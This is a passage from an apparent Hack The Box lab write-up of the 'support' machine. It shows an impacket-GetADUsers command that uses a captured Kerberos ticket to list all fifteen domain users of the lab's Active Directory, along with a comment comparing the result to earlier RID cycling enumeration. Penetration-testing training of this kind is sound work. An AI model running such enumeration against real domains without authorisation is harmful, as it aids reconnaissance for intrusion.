Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=ldap@dc.support.htb.ccache impacket-GetADUsers support.htb/ -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting machine hostname
[*] Querying DC for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
anderson.damian anderson.damian@support.htb 2022-05-28 13:13:05.993295 <never>
bardot.mary bardot.mary@support.htb 2022-05-28 13:14:08.633925 <never>
cromwell.gerard cromwell.gerard@support.htb 2022-05-28 13:14:24.258920 <never>
daughtler.mabel daughtler.mabel@support.htb 2022-05-28 13:15:26.274558 <never>
ford.victoria ford.victoria@support.htb 2022-05-28 13:15:58.118301 <never>
hernandez.stanley hernandez.stanley@support.htb 2022-05-28 13:12:34.870818 <never>
langley.lucy langley.lucy@support.htb 2022-05-28 13:15:10.930801 <never>
levine.leopoldo levine.leopoldo@support.htb 2022-05-28 13:13:37.508924 <never>
monroe.david monroe.david@support.htb 2022-05-28 13:14:39.712058 <never>
raven.clifton raven.clifton@support.htb 2022-05-28 13:13:53.133921 <never>
smith.rosario smith.rosario@support.htb 2022-05-28 13:12:19.305799 <never>
stoll.rachelle stoll.rachelle@support.htb 2022-05-28 13:15:42.290214 <never>
thomas.raphael thomas.raphael@support.htb 2022-05-28 13:13:21.774558 <never>
west.laura west.laura@support.htb 2022-05-28 13:14:55.446424 <never>
wilson.shelby wilson.shelby@support.htb 2022-05-28 13:12:50.352678 <never> Extracting all the domain users using the TGT of the ldap account
It would appear that the username enumeration made with the RID Cycling attack earlier did not miss out a single domain user